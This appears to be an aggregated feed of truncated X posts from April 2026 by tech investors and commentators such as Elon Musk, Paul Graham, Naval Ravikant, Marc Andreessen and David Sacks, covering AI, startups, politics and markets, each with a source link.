by @elonmusk: Best ad for Grok imaginable. \"I can't manipulate this AI into lying to me.\"\n[原文链接](https://x.com/elonmusk/status/2048930958502482277)\n\n**[2026-04-27T23:03:05+00:00]**\n> RT by @elonmusk: All three of the liberal justices dissented from the order allowing Texas to use their new congressional map. But these same justices all voted with a unanimous court back in Februar…\n[原文链接](https://x.com/elonmusk/status/2048900774025986532)\n\n**[2026-04-27T14:04:14+00:00]**\n> RT by @elonmusk: When I wrote The New White Nationalism in America in 2002, there were roughly 2,000 KKK members left in the entire nation — and a large percentage were suspected paid informants. Rea…\n[原文链接](https://x.com/elonmusk/status/2048765165533868432)\n\n---\n\n### ✅ @paulg — Paul Graham(20 条)\n\n**[2026-04-29T09:13:21+00:00]**\n> R to @paulg: Why do I assume his successors will be more principled? Partly because almost everyone is, even in politics. And partly because if they aren't, it won't matter much who's president, beca…\n[原文链接](https://x.com/paulg/status/2049416736806449649)\n\n**[2026-04-29T09:11:10+00:00]**\n> R to @paulg: He'll leave the opposite legacy. His more principled successors will have a harder time getting things done, because of the walls everyone has built to protect against Trump's overreach.\n[原文链接](https://x.com/paulg/status/2049416188568949159)\n\n**[2026-04-29T09:09:13+00:00]**\n> Trump's bullying only works (and only temporarily at that) because he's taking advantage of the high-trust customs and relationships established by more principled predecessors.\n[原文链接](https://x.com/paulg/status/2049415696694587729)\n\n**[2026-04-29T03:42:31+00:00]**\n> RT by @paulg: MIT student asked a question earlier today that a lot of young founders are quietly wondering about: \"Won’t the frontier labs just do everything?\" Yes it's true that OAI/Ant are shippin…\n[原文链接](https://x.com/paulg/status/2049333482271260710)\n\n**[2026-04-29T03:29:10+00:00]**\n> RT by @paulg: What do the smartest kids in the world do when they grow up? I did the largest study of ~18,000 International Olympiad medalists (IMO, IOI and IPhO) over the last 25yrs, arguably the sh…\n[原文链接](https://x.com/paulg/status/2049330123464393084)\n\n**[2026-04-28T20:39:11+00:00]**\n> We're in Stockholm. You know how there are some places where you think \"Nice place to visit, but I wouldn't want to live there\"? Stockholm is the kind of place that makes you want to live there.\n[原文链接](https://x.com/paulg/status/2049226946471489602)\n\n**[2026-04-28T20:35:56+00:00]**\n> There are some real bombshells in this one.\n[原文链接](https://x.com/paulg/status/2049226128603172949)\n\n**[2026-04-28T20:32:16+00:00]**\n> \"He just doesn't listen to me. Just like you.\" — Jessica on our younger son\n[原文链接](https://x.com/paulg/status/2049225204132421727)\n\n**[2026-04-27T23:13:11+00:00]**\n> If you skip some or all of college to start a startup, it's on you to develop your mind the way college would have. And that's not something that happens by default in most startups.\n[原文链接](https://x.com/paulg/status/2048903314759196893)\n\n**[2026-04-27T10:01:28+00:00]**\n> One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.\n[原文链接](https://x.com/paulg/status/2048704073356935676)\n\n**[2026-04-27T09:50:40+00:00]**\n> You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.\n[原文链接](https://x.com/paulg/status/2048701354672050286)\n\n**[2026-04-27T08:17:48+00:00]**\n> Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.\n[原文链接](https://x.com/paulg/status/2048677984106664227)\n\n**[2026-04-27T04:08:42+00:00]**\n> RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France. My French friend of @Fundoraclu…\n[原文链接](https://x.com/paulg/status/2048615296613937201)\n\n**[2026-04-26T14:48:06+00:00]**\n> RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one. GPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it. Whole ne…\n[原文链接](https://x.com/paulg/status/2048413815675539816)\n\n**[2026-04-26T14:47:09+00:00]**\n> Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought…\n[原文链接](https://x.com/paulg/status/2048413578789634100)\n\n**[2026-04-26T14:40:28+00:00]**\n> Durer was the original Dr Seuss.\n[原文链接](https://x.com/paulg/status/2048411898081583547)\n\n**[2026-04-26T14:36:59+00:00]**\n> Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I…\n[原文链接](https://x.com/paulg/status/2048411021329453562)\n\n**[2026-04-26T13:37:21+00:00]**\n> RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank https://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-cal…\n[原文链接](https://x.com/paulg/status/2048396013816152216)\n\n**[2026-04-25T14:17:57+00:00]**\n> RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.\n[原文链接](https://x.com/paulg/status/2048043843690561556)\n\n**[2026-04-25T08:33:48+00:00]**\n> RT by @paulg: GitHub outages since Microsoft acquisition 🤣\n[原文链接](https://x.com/paulg/status/2047957234664030380)\n\n---\n\n### ✅ @naval — Naval Ravikant(11 条)\n\n**[2026-04-29T06:01:47+00:00]**\n> \"Savings Tax.\"\n[原文链接](https://x.com/naval/status/2049368528445403351)\n\n**[2026-04-29T04:45:11+00:00]**\n> R to @naval: Apple: http://apple.co/4cF5VWZ Spotify: http://open.spotify.com/episode/5C1aTaJwlpkGC7Lj0cqDrx YouTube: http://youtu.be/hTdSU7q5WCo Transcript: http://nav.al/code — Presented by AngelLis…\n[原文链接](https://x.com/naval/status/2049349252112089553)\n\n**[2026-04-29T04:45:10+00:00]**\n> New podcast on vibe coding - A Return to Code. A Return to Coding 00:20 The Personal App Store 03:17 Vibe Coding Is a Video Game with Real-World Rewards 06:22 Pure Software Is Uninvestable 10:33 A Pl…\n[原文链接](https://x.com/naval/status/2049349249905951175)\n\n**[2026-04-28T04:41:00+00:00]**\n> RT by @naval: Unfortunately, those in power in Sacramento seem blind to second order effects. We are now in a situation where this wealth tax is very likely to pass. This means founders who control t…\n[原文链接](https://x.com/naval/status/2048985810842865914)\n\n**[2026-04-24T11:53:43+00:00]**\n> RT by @naval: Fundrise VCX is exactly why USVC needs to exist. Retail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away. VCX turned that demand into a liquid public w…\n[原文链接](https://x.com/naval/status/2047645157080658335)\n\n**[2026-04-24T05:39:10+00:00]**\n> R to @naval: x.com/avlok/status/204754692…\n[原文链接](https://x.com/naval/status/2047550896670908809)\n\n**[2026-04-24T05:23:22+00:00]**\n> RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But…\n[原文链接](https://x.com/naval/status/2047546920747307466)\n\n**[2026-04-24T03:37:14+00:00]**\n> Hari nails it: “Don’t listen to people who don’t know how private markets work.”\n[原文链接](https://x.com/naval/status/2047520212787015748)\n\n**[2026-04-24T03:33:25+00:00]**\n> R to @naval: x.com/haridigresses/status/2…\n[原文链接](https://x.com/naval/status/2047519250433421604)\n\n**[2026-04-24T02:58:19+00:00]**\n> R to @naval: x.com/nivi/status/2047471220…\n[原文链接](https://x.com/naval/status/2047510419565420779)\n\n**[2026-04-22T16:34:52+00:00]**\n> Introducing USVC - a single basket of high-growth venture capital, for everyone. No accreditation required, SEC-registered, and a very low $500 minimum. Includes OpenAI, Anthropic, xAI, Sierra, Cruso…\n[原文链接](https://x.com/naval/status/2046991137022648800)\n\n---\n\n### ✅ @pmarca — Marc Andreessen(20 条)\n\n**[2026-04-28T20:26:28+00:00]**\n> Image\n[原文链接](https://x.com/pmarca/status/2049223746368483370)\n\n**[2026-04-28T20:20:22+00:00]**\n> “YouTube videos about AI, but with no soyface”\n[原文链接](https://x.com/pmarca/status/2049222212008206717)\n\n**[2026-04-28T18:27:56+00:00]**\n> The AI we thought we’d get was bloodless alien machine intelligence. The AI we actually got was the complete knowledge and culture of our civilization reflected back at us. Of course we will love it …\n[原文链接](https://x.com/pmarca/status/2049193915249574141)\n\n**[2026-04-28T18:25:59+00:00]**\n> Many such cases?\n[原文链接](https://x.com/pmarca/status/2049193427120603173)\n\n**[2026-04-28T18:06:36+00:00]**\n> Asking AI to ask questions is hugely underrated.\n[原文链接](https://x.com/pmarca/status/2049188549342138449)\n\n**[2026-04-28T18:06:07+00:00]**\n> American Intelligence\n[原文链接](https://x.com/pmarca/status/2049188427921334606)\n\n**[2026-04-28T17:45:34+00:00]**\n> Found the AI killer app.\n[原文链接](https://x.com/pmarca/status/2049183253764936068)\n\n**[2026-04-28T07:08:35+00:00]**\n> Overheard in Silicon Valley: “Alexander wept, for there were no more situations left to monitor.” cc @MTSlive\n[原文链接](https://x.com/pmarca/status/2049022953031950466)\n\n**[2026-04-28T05:44:36+00:00]**\n> It’s a mystery. We’ll never know.\n[原文链接](https://x.com/pmarca/status/2049001817015529591)\n\n**[2026-04-28T05:41:22+00:00]**\n> Actual anti-AI energy is the newest instance of @robkhenderson’s “luxury beliefs” — a small fringe of elites playing at radical politics. For normal people, AI is a useful app on their phone, and the…\n[原文链接](https://x.com/pmarca/status/2049001003823829379)\n\n**[2026-04-28T05:32:39+00:00]**\n> It won’t happen. People say all kinds of things in surveys. Watch what they do instead. And what they do is… use AI.\n[原文链接](https://x.com/pmarca/status/2048998808143425821)\n\n**[2026-04-28T04:49:55+00:00]**\n> Oh no\n[原文链接](https://x.com/pmarca/status/2048988054220615991)\n\n**[2026-04-28T02:50:17+00:00]**\n> 👀\n[原文链接](https://x.com/pmarca/status/2048957950816137683)\n\n**[2026-04-28T02:38:33+00:00]**\n> Thomas Sowell: “Verbal virtuosity”.\n[原文链接](https://x.com/pmarca/status/2048954994842612091)\n\n**[2026-04-28T02:36:20+00:00]**\n> Key retardmaxxing method, 10/10 no notes.\n[原文链接](https://x.com/pmarca/status/2048954437897777249)\n\n**[2026-04-28T02:26:44+00:00]**\n> The smart people work for the… less smart people.\n[原文链接](https://x.com/pmarca/status/2048952024348373321)\n\n**[2026-04-28T02:25:05+00:00]**\n> It wasn’t AI, it was the COVID hiring binge + interest rate spike hangover.\n[原文链接](https://x.com/pmarca/status/2048951609124909387)\n\n**[2026-04-28T01:04:27+00:00]**\n> \"default presumption is that productivity gains lead to increased demand. burden of persuasion is with the doomers to show why this time is gonna be different.\"\n[原文链接](https://x.com/pmarca/status/2048931314330685922)\n\n**[2026-04-28T00:55:51+00:00]**\n> \"thats not a sign of an economy about to collapse, thats a sign of a tool so productive that time itself becomes the bottleneck.\"\n[原文链接](https://x.com/pmarca/status/2048929149205831923)\n\n**[2026-04-27T18:24:14+00:00]**\n> RT by @pmarca: Wow I'm actually shocked that the SPLC was featured in the latest Nathan For You episode.\n[原文链接](https://x.com/pmarca/status/2048830598752739496)\n\n---\n\n### ✅ @david_tiantian — David Tian Wang(0 条)\n\n---\n\n### ✅ @morganhousel — Morgan Housel(1 条)\n\n**[2026-04-22T18:05:41+00:00]**\n> \"Self-control is empathy with your future self.\" - Seinfeld\n[原文链接](https://x.com/morganhousel/status/2047013991046881663)\n\n---\n\n### ✅ @eladgil — Elad Gil(10 条)\n\n**[2026-04-27T20:41:36+00:00]**\n> Mon afternoon song 2 (remix much better then original) https://www.youtube.com/watch?v=fLdTlfK_5KQ&list=RDGMEMWO-g6DgCWEqKlDtKbJA1Gw&start_radio=1&rv=dvQJIgjlR3I\n[原文链接](https://x.com/eladgil/status/2048865167233200586)\n\n**[2026-04-27T20:35:37+00:00]**\n> Mon afternoon song https://www.youtube.com/watch?v=dvQJIgjlR3I\n[原文链接](https://x.com/eladgil/status/2048863662396658146)\n\n**[2026-04-27T16:36:07+00:00]**\n> RT by @eladgil: \"Every society at it's apex ultimately has built large public art to inspire the next generation\" @eladgil\n[原文链接](https://x.com/eladgil/status/2048803386938495412)\n\n**[2026-04-24T18:44:49+00:00]**\n> RT by @eladgil: Adopting Claude speak in my regular life, episode 1: Partner: Did you do the dishes tonight? Me: Yes they're done. Partner: Why are they still dirty? Me: You're right to push back. I …\n[原文链接](https://x.com/eladgil/status/2047748613976264835)\n\n**[2026-04-24T01:35:02+00:00]**\n> New life plan- Move to Brooklyn Get neck tat Ride bike everywhere Cold brew own coffee (also start drinking coffee) Adopt 12 year old stray cat, name him Nietzsche Vape mango pods, but ironically Wea…\n[原文链接](https://x.com/eladgil/status/2047489459378397604)\n\n**[2026-04-23T21:04:47+00:00]**\n> RT by @eladgil: How does one make sense of SF? We are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t…\n[原文链接](https://x.com/eladgil/status/2047421448449630379)\n\n**[2026-04-23T17:55:03+00:00]**\n> Entrepreneurship is a distributed search job across the surface of commercial opportunities\n[原文链接](https://x.com/eladgil/status/2047373700643844303)\n\n**[2026-04-23T17:20:32+00:00]**\n> Big congrats\n[原文链接](https://x.com/eladgil/status/2047365014500389353)\n\n**[2026-04-23T17:19:56+00:00]**\n> My view is the AI boom will only accelerate and is a once in a lifetime transformation This is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs…\n[原文链接](https://x.com/eladgil/status/2047364865527075139)\n\n**[2026-04-22T20:39:39+00:00]**\n> <3 @infisical\n[原文链接](https://x.com/eladgil/status/2047052737762980083)\n\n---\n\n### ✅ @DavidSacks — David Sacks(20 条)\n\n**[2026-04-27T17:47:07+00:00]**\n> Cole Allen didn’t need to go down a fringe rabbit hole to become radicalized. He just needed to believe the MSM’s inflammatory rhetoric, lies, and hoaxes about Trump.\n[原文链接](https://x.com/DavidSacks/status/2048821257534111863)\n\n**[2026-04-27T17:16:26+00:00]**\n> R to @DavidSacks: x.com/a16z/status/1985413352…\n[原文链接](https://x.com/DavidSacks/status/2048813533136060459)\n\n**[2026-04-27T17:15:33+00:00]**\n> R to @DavidSacks: The problem with most of the “AI Safety” crowd is that their solutions always favor more government centralization and control. In other words, they will bring about the Orwellian f…\n[原文链接](https://x.com/DavidSacks/status/2048813311668486300)\n\n**[2026-04-27T17:08:20+00:00]**\n> Concerning. As I’ve said many times before, the biggest risk of AI isn’t James Cameron’s The Terminator, it’s George Orwell’s 1984.\n[原文链接](https://x.com/DavidSacks/status/2048811495224390105)\n\n**[2026-04-26T20:42:24+00:00]**\n> MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.\n[原文链接](https://x.com/DavidSacks/status/2048502978626113625)\n\n**[2026-04-26T17:37:26+00:00]**\n> RT by @DavidSacks: Accurate\n[原文链接](https://x.com/DavidSacks/status/2048456433981591867)\n\n**[2026-04-26T15:03:35+00:00]**\n> RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by t…\n[原文链接](https://x.com/DavidSacks/status/2048417712439689346)\n\n**[2026-04-25T18:47:09+00:00]**\n> RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to ma…\n[原文链接](https://x.com/DavidSacks/status/2048111588930986354)\n\n**[2026-04-25T13:54:41+00:00]**\n> RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI From David Sacks \"Historically we only had two …\n[原文链接](https://x.com/DavidSacks/status/2048037985765949537)\n\n**[2026-04-25T03:16:09+00:00]**\n> RT by @DavidSacks: Incredible return on investment! 💰💰💰\n[原文链接](https://x.com/DavidSacks/status/2047877294476116184)\n\n**[2026-04-25T02:52:39+00:00]**\n> SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.\n[原文链接](https://x.com/DavidSacks/status/2047871382923469241)\n\n**[2026-04-25T02:37:36+00:00]**\n> Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.\n[原文链接](https://x.com/DavidSacks/status/2047867592790946189)\n\n**[2026-04-25T00:55:54+00:00]**\n> RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.” JASON: “What would happen if Kamala ‘Ding Dong’ was in right now?” SACKS: “We'd have n…\n[原文链接](https://x.com/DavidSacks/status/2047842000632713369)\n\n**[2026-04-24T23:41:01+00:00]**\n> RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening. @Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"…\n[原文链接](https://x.com/DavidSacks/status/2047823154655932696)\n\n**[2026-04-24T22:41:49+00:00]**\n> RT by @DavidSacks: POD UP! Core four is back 🚨 Big show: -- SpaceX-Cursor deal, using compute as leverage -- SaaS debt bomb coming to PE?, venture debt risk -- Software bloodbath, buy low potential? …\n[原文链接](https://x.com/DavidSacks/status/2047808256047821141)\n\n**[2026-04-24T16:41:47+00:00]**\n> R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.\n[原文链接](https://x.com/DavidSacks/status/2047717649849659586)\n\n**[2026-04-24T15:43:39+00:00]**\n> RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal: https://cnb.cx/4d3HAKp\n[原文链接](https://x.com/DavidSacks/status/2047703023690924289)\n\n**[2026-04-24T15:10:25+00:00]**\n> RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about…\n[原文链接](https://x.com/DavidSacks/status/2047694657107165519)\n\n**[2026-04-24T13:41:49+00:00]**\n> R to @DavidSacks: Full article: https://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share\n[原文链接](https://x.com/DavidSacks/status/2047672359377588241)\n\n**[2026-04-24T13:39:13+00:00]**\n> Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs wer…\n[原文链接](https://x.com/DavidSacks/status/2047671706660073767)\n\n---\n\n### ✅ @HarryStebbings — Harry Stebbings(20 条)\n\n**[2026-04-29T01:24:00+00:00]**\n> \"SBC becomes a problem when stock prices fall and dilution explodes. What was 3% annual dilution can quickly become 10%, creating a downward spiral that is hard to escape. The fix is to be far more s…\n[原文链接](https://x.com/HarryStebbings/status/2049298621951058341)\n\n**[2026-04-29T00:05:00+00:00]**\n> \"No, layoffs alone will not fix the problem. If a company has become bloated, simply cutting 50% often just leaves you with half the same mediocrity. The real issue is culture and talent quality, and…\n[原文链接](https://x.com/HarryStebbings/status/2049278741583643076)\n\n**[2026-04-28T22:24:00+00:00]**\n> \"You cannot have only A players in every role, some functions are just there to keep the business running. But you can build a team where the people you keep are the highest performers in those roles…\n[原文链接](https://x.com/HarryStebbings/status/2049253323329704378)\n\n**[2026-04-28T21:21:16+00:00]**\n> I am worried by the constraining exit options for venture backed companies: 1. IPOs: You can’t IPO with less than $500M in revenue and even then, it’s not a slam dunk. Everyone that has so far has be…\n[原文链接](https://x.com/HarryStebbings/status/2049237538901020767)\n\n**[2026-04-28T20:31:00+00:00]**\n> Do the majority of company teams need to be rebuilt for the technology we have today? \"Yes, teams need to be rebuilt for the AI era. If roles are going to be automated or not adapting fast enough, yo…\n[原文链接](https://x.com/HarryStebbings/status/2049224886128722345)\n\n**[2026-04-28T18:28:00+00:00]**\n> The Best Founders are Not Motivated by Money: \"Founders don't tend to be motivated by money as well. The best are motivated by personal growth development, being inspired, finding things intellectual…\n[原文链接](https://x.com/HarryStebbings/status/2049193932144164986)\n\n**[2026-04-28T15:14:00+00:00]**\n> Why investors need to give CEOs better comp packages: \"We went public in 21. First year, the stock went up to about 40BN market cap. In 2022, we fell 92% to a little under $4 billion market cap. For …\n[原文链接](https://x.com/HarryStebbings/status/2049145110491967672)\n\n**[2026-04-28T13:02:27+00:00]**\n> When I was 22 I was offered £18M (all cash) for 20VC media company. With any tough decision, I went for a walk with my mother, she asked me one question: “What would you do tomorrow if you did sell t…\n[原文链接](https://x.com/HarryStebbings/status/2049112007475855369)\n\n**[2026-04-28T11:57:12+00:00]**\n> A venture firm saying we should have a podcast is like when they say they think AI is going to be big.\n[原文链接](https://x.com/HarryStebbings/status/2049095586335343034)\n\n**[2026-04-28T01:24:00+00:00]**\n> What No One Knows That Everyone Should Know About Being CEO of a Public Company: \"The other thing that people miss is that the CEO's job in a company, especially one that's gone from small to very, v…\n[原文链接](https://x.com/HarryStebbings/status/2048936233993413097)\n\n**[2026-04-27T21:38:00+00:00]**\n> Why it is sub-optimal for founders to also be angel investing: \"I don't invest anymore, for a couple reasons. 1. In order to invest, you've got to sell shares in your own business to have liquidity t…\n[原文链接](https://x.com/HarryStebbings/status/2048879359318958273)\n\n**[2026-04-27T18:45:00+00:00]**\n> The Truth About Being a CEO and a Parent: \"I felt like for my children, I became more distant 'cause I wasn't paying attention to them. I think any founder knows this experience. If they have kids, y…\n[原文链接](https://x.com/HarryStebbings/status/2048835822292725957)\n\n**[2026-04-27T14:02:33+00:00]**\n> R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 Apple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/i…\n[原文链接](https://x.com/HarryStebbings/status/2048764743205134644)\n\n**[2026-04-27T14:02:33+00:00]**\n> Adam Foroughi is by far one of the best CEOs I have ever interviewed. Candidly he is insanely stern and cold but also obsessive, focused and utterly brilliant. With Adam there is zero fluff, like non…\n[原文链接](https://x.com/HarryStebbings/status/2048764741435179442)\n\n**[2026-04-27T13:30:16+00:00]**\n> Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. Amazing business. Ins…\n[原文链接](https://x.com/HarryStebbings/status/2048756619622707452)\n\n**[2026-04-26T22:34:46+00:00]**\n> We hired someone for the investing team. Something I never planned to do. They sent the team 3 new deals per day for 90 days straight. All aligned to our stage, geography and deal type. That’s how yo…\n[原文链接](https://x.com/HarryStebbings/status/2048531257399664920)\n\n**[2026-04-26T19:35:39+00:00]**\n> I have interviewed 1,000 of the best CEOs of the last 10 years. Adam Foroughi, Founder @AppLovin is easily top 3, ever. $160BN Market Cap $5.48BN Revenue $10M EBITDA per head 82%+ margins Just 450 pe…\n[原文链接](https://x.com/HarryStebbings/status/2048486182904852537)\n\n**[2026-04-26T15:07:55+00:00]**\n> Seeing two types of founders emerge in this moment: The tourists and the terminators. The terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want …\n[原文链接](https://x.com/HarryStebbings/status/2048418806867870115)\n\n**[2026-04-26T13:56:31+00:00]**\n> The best founders I know all text their investors. None of them email them. The relationship will blossom and deepen in a matter of messages.\n[原文链接](https://x.com/HarryStebbings/status/2048400836024283246)\n\n**[2026-04-24T21:38:00+00:00]**\n> This week I got to sit down with two truly generational CEOs and ask them anything: @tobi @Shopify ($160BN Market Cap) Adam Foroughi @AppLovin ($160BN Market Cap) I have the best job in the world.\n[原文链接](https://x.com/HarryStebbings/status/2047792195868967172)\n\n---\n\n### ✅ @jason — Jason Calacanis(20 条)\n\n**[2026-04-29T01:07:12+00:00]**\n> Big Zesty 💪\n[原文链接](https://x.com/jason/status/2049294394075849059)\n\n**[2026-04-29T00:05:58+00:00]**\n> Oh lordy... here comes the lawfare madness again 🤦 86 when I grew up in the restaurant business meant “to get rid of” something (ie “86 clams” meant to take clams off the menu). I was told it had two…\n[原文链接](https://x.com/jason/status/2049278984513310783)\n\n**[2026-04-28T23:51:30+00:00]**\n> Not investment advice…. but WERE AT A FOUR YEAR HIGH AND WE CRUSHED EARNINGS 😂😂🤦😂😂 Never change Philly!!!\n[原文链接](https://x.com/jason/status/2049275346109796388)\n\n**[2026-04-28T23:50:25+00:00]**\n> Lock in, GAME FIVE, @knicks fam! @BenStiller @jalenbrunson1 @Arifromanhattan \"\">@CPTheFanchise @jerryferrara @MrChuckD @RealChalamet @fredwilson @msavino @JDSportsTalkNY @nihalmehta @WorldWideWob @Bi…\n[原文链接](https://x.com/jason/status/2049275070800150851)\n\n**[2026-04-28T22:28:53+00:00]**\n> If this passes, what impact (if any) do you think @RoKhanna’s $25 minimum wage will have on unemployment rate in California? Show your work.\n[原文链接](https://x.com/jason/status/2049254554550653047)\n\n**[2026-04-28T19:59:07+00:00]**\n> There are five things you can focus on in your life that will help you lead a balanced and fulfilling life.\n[原文链接](https://x.com/jason/status/2049216863574364182)\n\n**[2026-04-28T19:58:37+00:00]**\n> If you're feeling unbalanced in your life, I highly recommend checking in on my big five.\n[原文链接](https://x.com/jason/status/2049216735912329567)\n\n**[2026-04-28T19:55:41+00:00]**\n> We're all standing on the shoulders of Adam Curry and Dave Weiner.\n[原文链接](https://x.com/jason/status/2049215999795138656)\n\n**[2026-04-28T19:54:02+00:00]**\n> RT by @Jason: Peter Thiel: “We’ve tried to do too much investing in Europe. It’s always sort of a junket.” “It’s a nice place to go on vacation as an investor.” “It’s a very strange thing—the US is s…\n[原文链接](https://x.com/jason/status/2049215583351341460)\n\n**[2026-04-28T19:52:16+00:00]**\n> AutoLane is my next uber.\n[原文链接](https://x.com/jason/status/2049215140810072429)\n\n**[2026-04-28T19:52:00+00:00]**\n> The future is autonomous, and auto lane is going to play a major role in managing autonomy for giant parking lots! Highly recommend listening to this podcast to understand what the future will look l…\n[原文链接](https://x.com/jason/status/2049215070970814469)\n\n**[2026-04-28T19:51:11+00:00]**\n> What album or two do you have in deep rotation at the moment? It could be from the archives or it could be a brand new selection.\n[原文链接](https://x.com/jason/status/2049214864912978399)\n\n**[2026-04-28T18:53:59+00:00]**\n> .@ZohranKMamdani is about to kill the Golden Goose\n[原文链接](https://x.com/jason/status/2049200471651353064)\n\n**[2026-04-28T18:33:33+00:00]**\n> might not be accurate for much longer...\n[原文链接](https://x.com/jason/status/2049195328092471563)\n\n**[2026-04-28T18:19:33+00:00]**\n> RT by @Jason: Looks like we've successfully ragebaited the CCP 🫠\n[原文链接](https://x.com/jason/status/2049191806135324774)\n\n**[2026-04-28T16:30:48+00:00]**\n> RT by @Jason: “Sam Altman comes from the Zuckerberg school of business: give dumb people access to your tools, study them and, like the Borg, steal every innovation they have.” - @Jason they're not j…\n[原文链接](https://x.com/jason/status/2049164438989672648)\n\n**[2026-04-27T22:48:45+00:00]**\n> RT by @Jason: China is blocking Meta’s Manus acquisition, and it might just be our news story of the year. If a startup is strategically important, the CCP can just reach through with a “golden share…\n[原文链接](https://x.com/jason/status/2048897167234826325)\n\n**[2026-04-27T21:35:25+00:00]**\n> Image\n[原文链接](https://x.com/jason/status/2048878709784928524)\n\n**[2026-04-27T21:27:19+00:00]**\n> Another one ☝️\n[原文链接](https://x.com/jason/status/2048876670090727866)\n\n**[2026-04-27T17:13:52+00:00]**\n> This Beanie Can Read Your Thoughts… https://x.com/i/broadcasts/1qGvvkZPWgRGB\n[原文链接](https://x.com/jason/status/2048812889838928269)\n\n---\n\n### ✅ @charliebilello — Charlie Bilello(14 条)\n\n**[2026-04-29T01:56:48+00:00]**\n> R to @charliebilello: x.com/charliebilello/status/…\n[原文链接](https://x.com/charliebilello/status/2049306875301130507)\n\n**[2026-04-29T01:55:13+00:00]**\n> US home prices increased 0.7% over the last year, the slowest growth rate since June 2023. There are currently a record 46% more sellers than buyers nationally. Absent manipulation from the Federal G…\n[原文链接](https://x.com/charliebilello/status/2049306480071873011)\n\n**[2026-04-29T01:23:28+00:00]**\n> RT by @charliebilello: Since the start of the Iran war... Jet Fuel: +70% Sulfur: +60% Brent Crude Oil: +52% Heating Oil: +52% WTI Crude Oil: +48% Urea: +48% Diesel: +45% Gasoline: +40% European Nat G…\n[原文链接](https://x.com/charliebilello/status/2049298490489004357)\n\n**[2026-04-28T19:48:10+00:00]**\n> RT by @charliebilello: Tomorrow's News Today... BREAKING: NO CHANGE. THE FED HOLDS INTEREST RATES STEADY AT 3.50-3.75%, CITING CONTINUED UNCERTAINTY OVER THE WAR IN IRAN AND ITS IMPACT ON ECONOMIC GR…\n[原文链接](https://x.com/charliebilello/status/2049214106352107778)\n\n**[2026-04-28T12:21:00+00:00]**\n> RT by @charliebilello: Media Math… More Negative/Sensationalist = More Viewers = Higher Prices for Advertising = Larger Profits = Happier Shareholders Nowhere in the formula will you find educating, …\n[原文链接](https://x.com/charliebilello/status/2049101573477806428)\n\n**[2026-04-28T02:04:33+00:00]**\n> The top 0.1% of income earners in California make 12% of the state's total income and pay 27% of total income taxes. The bottom 50% of income earners make 12% of total income and pay 3% of total inco…\n[原文链接](https://x.com/charliebilello/status/2048946440173416655)\n\n**[2026-04-28T01:39:57+00:00]**\n> R to @charliebilello: A record 43% of these underwater car buyers are opting for 84-month (7-year) loans. Their average monthly payment: $932, the highest level ever recorded.\n[原文链接](https://x.com/charliebilello/status/2048940251079430151)\n\n**[2026-04-28T01:34:15+00:00]**\n> RT by @charliebilello: 30% of car buyers trading in vehicles in the US now have negative equity, owing an average of $7,200 on their old loans.\n[原文链接](https://x.com/charliebilello/status/2048938813385269297)\n\n**[2026-04-27T21:17:46+00:00]**\n> RT by @charliebilello: Since the start of the Iran war Jet Fuel: +68% Sulfur: +59% Heating Oil: +52% Urea: +49% Brent Crude Oil: +49% Diesel: +45% WTI Crude Oil: +44% European Natural Gas: +38% Gasol…\n[原文链接](https://x.com/charliebilello/status/2048874268478382262)\n\n**[2026-04-27T21:11:08+00:00]**\n> RT by @charliebilello: The S&P 500 ended the day at another all-time high, its 10th of the year. Video: 